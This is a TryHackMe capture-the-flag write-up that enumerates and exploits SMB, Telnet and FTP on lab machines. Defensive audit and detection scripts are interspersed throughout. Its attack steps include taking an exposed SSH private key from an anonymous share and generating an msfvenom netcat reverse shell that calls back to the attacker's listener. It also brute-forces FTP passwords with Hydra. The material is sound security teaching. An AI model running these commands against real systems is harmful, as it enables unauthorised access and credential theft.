Network Services - Common Services

 

The link for this lab is located here: https://tryhackme.com/room/networkservices


This room explores common Network Service vulnerabilities and misconfigurations on services such as SMB, Telnet and FTP - both explaining and exploiting each service.



Task 2 - Understanding SMB

SMB (Server Message Block Protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources.

Servers make file systems and other resources available to clients on the network.

The SMB protocol is known as a response-request protocol, meaning it transmits multiple messages between client and server to establish a connection. Clients connect to servers using TCP/IP, NetBEUI or IPX/SPX.

How Does SMB Work?

Once the PCs have established a connection to the server, clients can then send commands (known as SMBs) to the server to allow them to do various things like access shares, open/read/write files and more.

What Runs SMB?

Windows operating systems since Windows 95 have included client and server SMB protocol support. Samba, an open source server that supports the SMB protocol, was released for Unix systems.

Questions

Q1: What does SMB stand for? A: Server Message Block

Q2: What type of protocol is SMB? A: Response-Request

Q3: What do clients connect to servers using? A: TCP/IP

Q4: What systems does Samba run on? A: Unix


Task 3 - Enumerating SMB

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation. Enumeration is ESSENTIAL for an attack to be successful - wasting time throwing exploits at a machine hoping it works is not worth it.

Enumeration can gather incredible amounts of information including:

  • usernames

  • passwords

  • network information

  • hostnames

  • application data

  • services

Typically, there are SMB share drives on a server that can be connected to and used to view or transfer files. SMB shares are often a good place to look for sensitive information.

Port Scanning

The first step in enumeration is a port scan, to gather as much starting information about the services as possible: the services running, their versions and possibly the OS can all be detected.

In this room, we will use Nmap but feel free to use any other port scanner you are more comfortable with. For the initial scan, I will be using the Nmap switches “-A” which enables OS detection, version detection, script scanning and traceroute and “-p-” which will scan all 65535 ports.

Enum4Linux

Enum4Linux is a great tool for enumerating SMB shares on Windows and Linux. It is essentially a wrapper around the tools in the Samba package and makes it easy to extract SMB-related information from the target.

The syntax of Enum4Linux is very simple: enum4linux <options> <IP>. Some of the most useful options are:

  • -U (get userlist)

  • -M (get machine list)

  • -N (get namelist dump)

  • -S (get sharelist)

  • -P (get password policy information)

  • -G (get group and member list)

  • -A (all of the above)

Questions

Q1: Conduct an nmap scan of your choosing. How many ports are open? A: For my scan, I chose the command "nmap -sS -A -p- -oA initial 10.10.28.183": a TCP SYN scan, using -A mainly for service version and OS detection, "-p-" to scan all ports and "-oA initial" to write the results in all 3 formats (XML, Normal, Grepable).

Nmap Scan of SMB Machine

Q2: What port is SMB running on? A: Reading the Nmap output, we see that ports 139/445 are running instances of Samba smbd (which also tells us the OS is Linux, since Samba is in use).

Q3: Conduct a full basic enumeration using Enum4Linux. What is the workgroup name? A: Running the command "enum4linux -A 10.10.28.183" gives a very large output. Combing through it, we can see our WORKGROUP near the top. Remember that -A performs a full basic enumeration (userlist, machine list, sharelist, etc.).

Enum4Linux Output

Q4: What comes up as the name of the machine? A: Scrolling down our Enum4Linux output, we see the name of the machine in the section titled "OS Information". There is no label, but the machine name is highlighted in red in the screenshot.

Hostname of SMB Machine

Q5: What operating system version is running? A: This is in the same section - OS Information - and this time it is clearly labeled.

OS Version of Enum4Linux Output

Q6: What share sticks out as something we might want to investigate? A: When gathering information about a machine, one of the key resources we look for is usernames or possibly credentials. Under the "Share Enumeration" section you will see all the shares available on the machine. To us, the profiles share looks very intriguing.

Profiles Share Seems Interesting


Task 4 - Exploiting SMB

While there are vulnerabilities such as CVE-2017-7494 that can allow remote code execution (RCE) by exploiting SMB, you are more likely to encounter a situation where the best way into a system is due to misconfigurations rather than outdated versions (although they do still occur!)

In the case of this room, we will exploit anonymous SMB shares, a very common misconfiguration that can give us information leading to a shell. To learn more about anonymous shares and SMB hacking, I'd recommend this website.
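The misconfiguration exploited in this task is visible in the server's own smb.conf. As an added example (not part of the room and not Samba's code), the script below parses an smb.conf and flags the settings that let an unauthenticated client in; both config fragments are constructed, with the weak one beside its hardened form.

```python
"""Audit a Samba smb.conf for shares reachable without credentials.

Added example, not part of the room or of Samba itself: a defender's check
for the anonymous-share misconfiguration exploited in this task. The two
smb.conf fragments below are constructed, not the target's real config.
"""
import configparser

# Constructed: a share that an unauthenticated client can browse.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[profiles]
   path = /home/profiles
   guest ok = yes
   read only = yes
"""

# Constructed: the same share after hardening (guest access off, users restricted).
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never

[profiles]
   path = /home/profiles
   guest ok = no
   valid users = @staff
   read only = yes
"""

# smb.conf accepts synonyms; either key enables guest access on a share.
GUEST_KEYS = ("guest ok", "public")
TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Return {section: {key: value}} with lower-cased section and key names.

    smb.conf is INI-like, so configparser can read it once indentation is
    stripped; interpolation is disabled because values may contain '%' macros
    such as %U for the connecting user.
    """
    flat = "\n".join(line.strip() for line in text.splitlines())
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(flat)
    return {name.lower(): dict(parser.items(name)) for name in parser.sections()}


def audit_guest_access(text):
    """Return findings (strings) for settings that allow anonymous access.

    An empty list means no share is reachable without a valid account.
    Samba's defaults are "map to guest = Never" and "guest ok = no".
    """
    conf = parse_smb_conf(text)
    findings = []
    map_to_guest = conf.get("global", {}).get("map to guest", "never").lower()
    if map_to_guest != "never":
        findings.append(f"global: map to guest = {map_to_guest} (unknown users become guest)")
    for share, opts in conf.items():
        if share == "global":
            continue
        for key in GUEST_KEYS:
            if opts.get(key, "no").lower() in TRUE_VALUES:
                findings.append(f"[{share}]: {key} = {opts[key]} (no password required)")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_guest_access(conf) or ["no anonymous access found"])
```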

Method Breakdown

From our enumeration stage, we know:

  • The SMB share location

  • The name of an interesting share (profiles)

SMBClient

SMBclient is a tool used to access SMB shares. It is pre-installed on Kali Linux and Parrot OS, but if you need to download it, you can find it here

We can remotely access the SMB share by using the syntax:

smbclient //<IP>/<SHARE>

Followed by the tags:

  • -U <name> (specifies the user)

  • -p <port> (specifies the port)

Questions

Q1: What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port? A: First of all, we know that the default port for SMB is 445. The rest is a matter of substituting the details we know into the syntax specified above, with the -U parameter for the user and the -p parameter for the port: smbclient //10.10.10.2/secret -U suit -p 445

SMBClient Command Suits User

Q3: Let's see if the interesting share (profiles) has been configured to allow anonymous access via the username anonymous, the share of profiles and using no password. Does the share allow anonymous access (Y/N)? A: Referencing the command in the screenshot above, we know how to use smbclient to accomplish this. Simply change the share name from secret to profiles, change the username suit to anonymous and leave the default port. When prompted for the password, simply hit enter and you will be greeted with an SMB prompt - we have access!

SMBClient Command Accessing Profiles Folder

Q4: Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to? A: The SMB prompt is very similar to Linux with regards to commands. Typing "help" at the prompt will reveal all possible commands.

SMB Help Command

There is an interesting text document. We can read it using the "more" command and then specifying the file name in quotation marks (because it has spaces) - more "Working From Home Information.txt"

John Cactus Username

We see that there are two possible names this folder can belong to - John Cactus and John. It is more likely that it is John Cactus this folder belongs to as he is the person being addressed in the SMB Share.

Q5: What service has been configured to allow him to work from home? A: Reading the text document from the last question reveals that SSH access has been enabled on his account. SSH allows users to remotely access servers/workstations, authenticating with credentials or cryptographic keys. It is the secure version of Telnet.

Q6: Now we know this, what directory on the share should we look in? A: We can determine that the folder we want is ".ssh" as it is the same name as the service configured for John Cactus. However, doing a quick Google search will lead us to more information about this folder - if you want more information, click here

Q7: This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us? A: The ".ssh" directory contains two keys - a private (id_rsa) and public (id_rsa.pub). Anyone with a copy of the public key can encrypt data which can then only be read by the person who holds the corresponding private key. Therefore, the private key is the most important one to us (id_rsa)

Q8: Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. A: So, first we need to download the private key to our personal machine. We can do this in various ways using various commands. However, there is a built-in SMB command called "get" that will download any specified file to our working directory.

Downloading ID RSA key
Next, we have to change the permissions of the private key. SSH is very strict about the permissions of a private key and requires that only you can read it, or read and write it (permission 400 or 600 respectively). So, let's change the permissions to 600 before using it.

Changing RSA key permissions
Now that we have the RSA key and the right permissions, we need one more thing - the username. Now, there are two ways to do this. First, we could go through and guess all the common usernames for people - first-name, first-name-last-name, last-name, first-initial-last-name

However, there is a neat little trick here. If you go back to the SMB share and read the public key (id_rsa.pub) via the more command (more id_rsa.pub) you will actually see something very interesting at the end of the file

Finding Username in Public Key
As you can see at the end, there is a username and hostname (cactus = username, polosmb = hostname). From this, we can determine that the username is cactus saving us some time. All that is left for us to do now is connect using the RSA key instead of a password and we will be in.
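The username leak above comes from the key's comment field. As an added example (not from the room or from OpenSSH), this parser validates an OpenSSH public-key line and pulls out the comment so key files can be audited for account names; the key body is a constructed dummy, and "cactus@polosmb" is used only as the comment value the room reports.

```python
"""Parse an OpenSSH public key line and report what its comment leaks.

Added example, not from the room: the id_rsa.pub comment ("user@host") is
exactly what gave away the username above. The parser checks that the
base64 blob really is a key of the declared type and extracts the comment.
"""
import base64
import struct


def _ssh_string(payload):
    """Build an SSH wire-format string: uint32 big-endian length + bytes."""
    return struct.pack(">I", len(payload)) + payload


def _read_ssh_string(blob, offset):
    """Read one wire-format string from blob at offset; return (bytes, new_offset)."""
    if len(blob) < offset + 4:
        raise ValueError("truncated key blob")
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    if len(blob) < start + length:
        raise ValueError("truncated key blob")
    return blob[start:start + length], start + length


def parse_public_key(line):
    """Return {'type', 'comment', 'user', 'host'} for a plain id_rsa.pub line.

    Raises ValueError if the blob is not valid base64 or its embedded key
    type does not match the prefix (a tampered or corrupted key). Lines with
    authorized_keys option prefixes (command=..., from=...) are not handled.
    """
    parts = line.strip().split(None, 2)
    if len(parts) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    key_type, b64 = parts[0], parts[1]
    comment = parts[2] if len(parts) == 3 else ""
    blob = base64.b64decode(b64, validate=True)
    embedded, _ = _read_ssh_string(blob, 0)
    if embedded.decode("ascii", "replace") != key_type:
        raise ValueError(f"blob says {embedded!r}, prefix says {key_type!r}")
    # OpenSSH defaults the comment to user@host at key generation time.
    user, sep, host = comment.partition("@")
    return {"type": key_type, "comment": comment,
            "user": user if sep else "", "host": host if sep else ""}


def make_test_key(key_type=b"ssh-rsa", comment="cactus@polosmb"):
    """Constructed public key line with a dummy, non-functional RSA body.

    Wire format for ssh-rsa is: string "ssh-rsa", mpint e, mpint n.
    """
    blob = (_ssh_string(key_type) + _ssh_string(b"\x01\x00\x01")
            + _ssh_string(b"\x00\xab\xcd"))
    return f"{key_type.decode()} {base64.b64encode(blob).decode()} {comment}".rstrip()


if __name__ == "__main__":
    print(parse_public_key(make_test_key()))
```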

To connect to a remote host using an RSA key, we use the command "ssh -i id_rsa [username]@[ip]". The "-i" parameter specifies the id_rsa key we want to use. Knowing this, we can simply use the username cactus and the IP of your target to connect.

Logging in as cactus
As you can see we are now logged in. All that is left is to grab the flag. Doing a simple "ls" command will show a text file. Inside, you will find your flag for this task.

Grabbing SMB.txt flag


Task 5 - Understanding Telnet

Telnet is an application protocol which allows you to connect and execute commands on a remote machine hosting a Telnet server. The telnet client will establish a connection with the server. The client will then become a virtual terminal - allowing you to interact with the remote host.

Telnet, however, sends ALL messages in clear text and has no specific security mechanisms. In many real-world environments, Telnet has been replaced by SSH.

Telnet works by the user connecting to the server using the Telnet protocol which means entering “telnet” into a terminal. The user then executes commands on the server using specific Telnet commands in the Telnet prompt. To connect to a Telnet server you can use the syntax:

telnet <IP> <port>

Questions

Q1: What is Telnet? A: Application Protocol

Q2: What has slowly replaced Telnet? A: SSH

Q3: How would you connect to a Telnet server with the IP 10.10.10.3 on port 23? A: We know looking above that the syntax is simply typing the telnet command with the IP first and the port second hence our command would be: telnet 10.10.10.3 23

Q4: The lack of what means that all Telnet communication is in plaintext? A: Encryption


Task 6 - Enumerating Telnet

Again, the first step is doing a port scan to find out as much information about the services, applications, structure and possible OS of the target. As discussed in the “Enumerating SMB” section, I will be performing the following Nmap scan (feel free to run your own with different flags):

nmap -sS -A -p- -oA initial 10.10.197.79

Questions

Q1: How many ports are open on the target machine? A: Running our scan and looking at the results, we can see that only 1 port is open - port 8012

Port 8012 is open

Q2: What port is this? A: Looking at the results from Q1, we can see it is port 8012

Q3: This port is unassigned but still lists the protocol it is using, what protocol is this? A: Looking at the Nmap scan, next to the port number there is a "/" followed by the protocol in use. In this case, "/tcp"

Q4: Now re-run the nmap scan without the "-p-" tag, how many ports show up as open? A: Omitting "-p-" makes Nmap scan the 1000 most common ports by default. In this case, our scan returns no open ports.

No Common ports open

Here we see that by assigning telnet to a non-standard port, it is NOT covered by the most common ports. It is important to try every angle when enumerating!
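The missed port above is the reason to keep and compare scan output. This added example (not part of the room) parses the .gnmap file that "-oA" writes and diffs two scans; both .gnmap snippets are constructed to mirror the room's result, not copied from it.

```python
"""Parse Nmap grepable output (.gnmap, written by -oA) and diff two scans.

Added example, not part of the room: a default scan (top 1000 ports)
missed the service on 8012 while "-p-" found it. The two .gnmap snippets
are constructed in Nmap's grepable format, not taken from the target.
"""
import re

# Constructed: what a "-p-" scan might record for the target.
FULL_SCAN_GNMAP = """# Nmap scan initiated as: nmap -sS -A -p- -oA initial 10.10.197.79
Host: 10.10.197.79 ()\tStatus: Up
Host: 10.10.197.79 ()\tPorts: 8012/open/tcp//unknown///\tIgnored State: closed (65534)
# Nmap done -- 1 IP address (1 host up) scanned in 120.00 seconds
"""

# Constructed: the same host scanned with the default (top 1000) port list.
DEFAULT_SCAN_GNMAP = """# Nmap scan initiated as: nmap -sS -A -oA default 10.10.197.79
Host: 10.10.197.79 ()\tStatus: Up
Host: 10.10.197.79 ()\tIgnored State: closed (1000)
# Nmap done -- 1 IP address (1 host up) scanned in 10.00 seconds
"""

# Each port entry has seven slash-separated fields (version may be empty):
# port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_gnmap(text):
    """Return {host: {(port, proto): {'state', 'service', 'version'}}}.

    Fields on a Host line are tab-separated "Name: value" pairs; a host
    with no open ports simply has no "Ports:" field.
    """
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]
        entries = hosts.setdefault(host, {})
        for m in PORT_RE.finditer(fields.get("Ports", "")):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            entries[(int(port), proto)] = {"state": state, "service": service,
                                           "version": version}
    return hosts


def open_ports(scan):
    """Set of (host, port, proto) reported open in a parsed scan."""
    return {(h, p, pr) for h, ports in scan.items()
            for (p, pr), info in ports.items() if info["state"] == "open"}


def missed_by(default_text, full_text):
    """Open ports present in the full scan but absent from the default scan."""
    return sorted(open_ports(parse_gnmap(full_text))
                  - open_ports(parse_gnmap(default_text)))


if __name__ == "__main__":
    for host, port, proto in missed_by(DEFAULT_SCAN_GNMAP, FULL_SCAN_GNMAP):
        print(f"{host}: {port}/{proto} only seen with -p-")
```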

Q6: Based on the title returned to us, what do we think this port could be used for? A: Looking at the output, we see an interesting string - "SKIDY'S BACKDOOR" which seems unusual. A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

Skidy Backdoor

Q7: Who could it belong to? A: The previous string - "SKIDY'S BACKDOOR" - seems to indicate that a user called Skidy executed a backdoor on this machine and is using it himself.


Task 7 - Exploiting Telnet

Telnet is insecure due to its lack of cryptography - it sends all its communication in plaintext and also has poor access control. There are various CVEs for Telnet client and server systems you could check on these sites:

A CVE (Common Vulnerabilities and Exposures) is a list of publicly disclosed computer security flaws. However, in the real world you are far more likely to find a misconfiguration in how it has been configured or is operating that will allow exploitation.

From the enumeration stage, we know:

  • There is a poorly hidden telnet service running

  • The service itself is a backdoor

  • Possible username of Skidy implicated

Using this information, we can connect to the Telnet port and try to get a reverse shell on the machine. You can connect using Telnet via the following syntax:

telnet [ip] [port]

Before we run this, we need to discuss what a reverse shell is. A “shell” is simply described as a piece of code or program that can be used to gain code or command execution on a device.

A reverse shell is a type of shell in which the target communicates BACK to us on our machine. Our machine has a listening port on which it receives the connection resulting in code or command execution.

First, let’s connect using Telnet via the following command:

telnet 10.10.197.79 8012


Questions

Q2: We have an open telnet connection. What welcome message do we receive? A: The very last sentence reveals our welcome message. In this case, it says "SKIDY'S BACKDOOR"

Welcome Message

Q3: Try executing some commands. Do we get a return on any input we enter into the telnet session (Y/N)? A: Typing .HELP reveals something back to us. However, typing any other commands gives us nothing back. In this case, no return from our input is given back to us.

No Return Input

Let's check if what we are typing is being executed as a system command. A: To do this, we can start a tcpdump listener, which will simply listen for all traffic on a certain interface (in this case, our OpenVPN interface for TryHackMe). I will not go into detail about tcpdump, but feel free to research it on your own.

Using the command "sudo tcpdump ip proto \\icmp -i tun0", we start our listener looking for ICMP traffic (pings).

TCPdump Listener Started

Next, try pinging our local machine (my Kali's tun0 IP address) from the target machine using the .RUN command: .RUN ping 10.11.3.112 -c 1 (the -c 1 sends only one ping).

Running Ping from Target

As we can see, the listener successfully picks up the pings from the target.

Pings Work Successfully

This means we can execute system commands and we can reach our local machine from the target.

Q6: Do we receive any pings? A: Looking at the last step, we know we can ping our local machine from the target via the Telnet session so we do receive pings.

Now, we can generate a reverse shell payload using msfvenom. This generates and encodes a netcat reverse shell for us. The syntax for this is as follows (your lhost IP will be different):

msfvenom -p cmd/unix/reverse_netcat lhost=10.11.3.112 lport=4444 R

Here is what it all means:

  • msfvenom (the tool to create custom payloads/shells)

  • -p (indicates our payload - in this case cmd/unix/reverse_netcat)

  • lhost (our machine’s IP address)

  • lport (port on OUR machine to listen for connections)

  • R (export the payload in raw format)

Q8: What word does the generated payload start with? A: Running this msfvenom command reveals the full command that we can run on the target machine. As we can see, the first word is mkfifo.

MSFVenom Output First Word

Next, we need to start a netcat listener on our local machine. This is the service that will “catch” the shell from the target machine when it connects back to our machine on the port we specified above (in my case, 4444). To run a netcat listener, we use the command:

nc -lvp 4444

Where:

  • -l (stands for listen mode)

  • -v (means verbose output)

  • -p (specifies the port)

Q9: What would the command look like for the listening port? A: We know that the syntax for the command is "nc -lvp [port number]" so our example would be "nc -lvp 4444"


Now that our netcat listener is running and waiting for a connection on port 4444, we can copy and paste the raw command from msfvenom (starting from mkfifo) into our Telnet session on the target machine. When run, it should connect to our Kali machine on port 4444 and give us a shell.


Now that it has run, we can check our netcat listener, and we should see that the target machine has connected to us.


Now, we can confirm who we are running as on this machine by typing the id command.


Perfect. We are root!

Q11: What are the contents of the flag.txt file? A: Doing a simple Linux command - ls - will reveal what is in this directory. There is a flag.txt file. Simply read the flag.txt file and you will get the flag



Task 8 - Understanding FTP

FTP (File Transfer Protocol) is a protocol used to allow remote transfer of files over a network. It uses a client-server model and relays commands and data in an efficient way.

A typical FTP session operates using two channels:

  • a command or control channel

  • a data channel

The command channel is used for transmitting and replying to commands, while the data channel is used for transferring data.

FTP clients initiate a connection with the server; the server validates the login credentials and then opens the session. When the session is open, the client may execute FTP commands on the server.

FTP servers can support Active and Passive connections:

  • Active - client opens a port and listens. Server is required to actively connect to it

  • Passive - server opens a port and listens (passively) and client connects to it

The separation of channels is a way of being able to send commands without having to wait for the current data transfer to finish.

For more details on the technicalities of FTP, you can click here

Questions

Q1: What communications model does FTP use? A: Client-Server

Q2: What is the standard FTP port? A: 21

Q3: How many modes of FTP connection are there? A: 2 - Active and Passive


Task 9 - Enumerating FTP

By now, you should be comfortable performing a port scan effectively. For this stage, we will exploit an anonymous FTP login to see what files we can access and whether they contain any interesting information.

It’s worth noting that some vulnerable versions of in.ftpd and other FTP server variants return different responses to the “cwd” command for home directories which exist and don’t exist.

These can be exploited because you can issue “cwd” commands before authentication, and if a home directory exists, there is likely a user account to go with it. This bug is mainly found in legacy systems, but it is still worth noting. You can read more about it here

Questions

Q1: How many ports are open on the target machine? A: Using my trusty nmap scan (nmap -sS -A -p- -oA initial [IP]), we can see that ports 21 and 80 are open.

Nmap Scan for FTP

Q2: What port is FTP running on? A: Looking at our output, we can see that port 21 is running FTP. Additionally, we know from above that port 21 is the default port for FTP.

Q3: What variant of FTP is running? A: Looking at the scan results for port 21, under the VERSION section, you will see the variant is vsftpd.

FTP Variant

Now we know what type of FTP server we are dealing with. The next step is to check whether we can log in anonymously to the FTP server. To do this, we use the simple syntax:

ftp [IP]

When prompted for a username, type “anonymous” and for the password use “anonymous” as well. When logged in, you can type “help” to get a list of commands you can use (you’ll notice most of them are simple Linux commands).

Q4: What is the name of the file in the anonymous FTP directory? A: Using the ls command, we can see there is a file in the directory called PUBLIC_NOTICE.txt.

File in Anonymous directory

Q4: What do we think a possible username could be? A: To read the file, we first need to download it to our local machine (good practice). This is possible with the "get" command followed by the filename - get PUBLIC_NOTICE.txt (transfer)

Downloading File from FTP

It will download to the directory you started in when connecting to the FTP server. Once you are in that directory, you can simply "cat" out the file to read it locally. (mike)

Reading the file & Gathering Username

After reading the file, we can see it is written by mike - this could be a username on this machine.

Now that we have a possible username for the FTP server, we can possibly login or crack Mike’s password using Hydra.



Task 10 - Exploiting FTP

Similar to Telnet, when using FTP the command and data channels are unencrypted. With FTP data being sent in plaintext, if a Man in the Middle attack took place, an attacker could reveal anything sent (even passwords).

An amazing article written by JScape demonstrates and explains this using ARP Poisoning.

When looking at an FTP server from our position, an avenue we can exploit is weak or default passwords.

From our enumeration stage, we know the following:

  • There is an FTP server running

  • We have a possible username of mike

Using this information, we can try cracking the password of the FTP server using the mike username.

To crack a password, we can use a tool called Hydra. Hydra is an online password cracking tool which performs rapid dictionary attacks against more than 50 protocols including Telnet, HTTP, SMB and much more!

The syntax for using Hydra to bruteforce a password with a given username is the following:

hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.176.18 ftp

Note that you may not have the rockyou.txt wordlist on your machine. This wordlist is VERY commonly used in CTFs and TryHackMe rooms, so it is vital. If you do not have it downloaded, you can find it here.

The syntax used above uses the following flags:

  • -t 4 (specifies the number of parallel connections per target)

  • -l [user] (username of person you are trying to crack)

  • -P [path to wordlist] (points to the wordlist you want to use)

  • -vV (sets verbose mode, shows every login+password combination)

  • [IP] (specifies target machine)

  • ftp (sets protocol to FTP)
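A dictionary attack like the one above is noisy on the server side: vsftpd writes one line per login attempt to its log. As an added example (not part of the room or of vsftpd), this script parses log lines in vsftpd's format and raises an alert when one client piles up failures against one account; the log lines are constructed, not taken from the target.

```python
"""Flag FTP password-guessing in vsftpd logs.

Added example, not part of the room: the defender's view of the Hydra run
above. vsftpd's default log (vsftpd.log) records one line per login attempt;
the lines below are constructed in that format, not taken from the target.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failures for "mike" from one client, then a success.
SAMPLE_LOG = """\
Mon Mar  2 10:14:20 2020 [pid 1201] CONNECT: Client "10.11.3.112"
Mon Mar  2 10:14:20 2020 [pid 1200] [mike] FAIL LOGIN: Client "10.11.3.112"
Mon Mar  2 10:14:20 2020 [pid 1203] [mike] FAIL LOGIN: Client "10.11.3.112"
Mon Mar  2 10:14:21 2020 [pid 1205] [mike] FAIL LOGIN: Client "10.11.3.112"
Mon Mar  2 10:14:21 2020 [pid 1207] [mike] FAIL LOGIN: Client "10.11.3.112"
Mon Mar  2 10:14:22 2020 [pid 1209] [mike] FAIL LOGIN: Client "10.11.3.112"
Mon Mar  2 10:14:22 2020 [pid 1211] [mike] OK LOGIN: Client "10.11.3.112"
Mon Mar  2 11:30:05 2020 [pid 1300] [anonymous] OK LOGIN: Client "10.10.14.5"
"""

# Matches only login-result lines; CONNECT and transfer lines are ignored.
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] "
    r"\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client \"(?P<client>[^\"]+)\""
)


def parse_login_events(text):
    """Yield (timestamp, client, user, result) for every login line."""
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if not m:
            continue
        # vsftpd pads single-digit days with a space ("Mar  2"); collapse it.
        ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
        yield ts, m["client"], m["user"], m["result"]


def detect_bruteforce(text, threshold=4, window=timedelta(seconds=60)):
    """Return one alert per (client, user) with >= threshold failures inside window.

    Each alert records whether a success followed the burst: that is the case
    needing a password reset for the account, not just a block on the client.
    """
    failures = defaultdict(list)
    successes = defaultdict(list)
    for ts, client, user, result in parse_login_events(text):
        (failures if result == "FAIL" else successes)[(client, user)].append(ts)

    alerts = []
    for key, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until the span fits.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                later_ok = any(t >= times[start] for t in successes.get(key, []))
                alerts.append({"client": key[0], "user": key[1],
                               "failures": len(times), "succeeded_after": later_ok})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```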

Questions

Q1: What is the password for the user mike? A: Using the command specified above on our attacking machine, it will run Hydra. After a couple of seconds, you will see a highlighted combination revealing the successful password for mike.

Cracking Mike via Hydra

Now that we have a username and password, we can once again connect to the machine using the ftp 10.10.176.18 command but this time using a username of mike and a password of password. Once logged in, we can list the files to see what there is in Mike’s directory.

Q3: What is ftp.txt? A: Once again, we see that there is a file called "ftp.txt" located in this directory. We can download it using the "get ftp.txt" command

Downloading FTP.txt file

Once downloaded, we can simply navigate to the directory it got downloaded to and "cat" it out to reveal our flag for this room.

Reading ftp.txt for the Flag


Task 11 - Expanding Your Knowledge

And that’s it! You’ve successfully completed this room. Congratulations. If you want to expand your skills further, check out more TryHackMe rooms or some of the following links:

